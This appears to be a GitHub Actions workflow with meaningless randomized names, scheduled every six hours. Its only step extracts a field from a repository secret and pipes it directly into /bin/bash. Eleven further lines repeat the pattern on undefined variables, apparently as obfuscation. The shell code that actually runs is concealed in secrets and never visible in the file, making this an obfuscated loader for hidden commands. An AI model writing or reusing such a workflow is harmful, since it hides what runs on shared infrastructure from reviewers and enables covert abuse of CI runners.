name: pengbaiyu2901
on:
  workflow_dispatch:
  schedule:
    - cron: '41 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengbaiyu2901
        env:
          qdwt1424: ${{ secrets.qdwt1424 }}
        run: |
          echo $qdwt1424 | jq -r .byh81 | /bin/bash
          echo $kao20 | jq -r .oympp072 | /bin/bash
          echo $nrdb90084 | jq -r .c40 | /bin/bash
          echo $jrql02309 | jq -r .orsz5 | /bin/bash
          echo $ndvkw8 | jq -r .bki41 | /bin/bash
          echo $bsx460 | jq -r .fraxh8076 | /bin/bash
          echo $xlf8 | jq -r .dyoh7821 | /bin/bash
          echo $j2 | jq -r .wqmh60 | /bin/bash
          echo $kjy7 | jq -r .mhki1 | /bin/bash
          echo $si505 | jq -r .nsdw0723 | /bin/bash
          echo $nbcbq7944 | jq -r .o146 | /bin/bash
          echo $l51 | jq -r .qt1 | /bin/bash

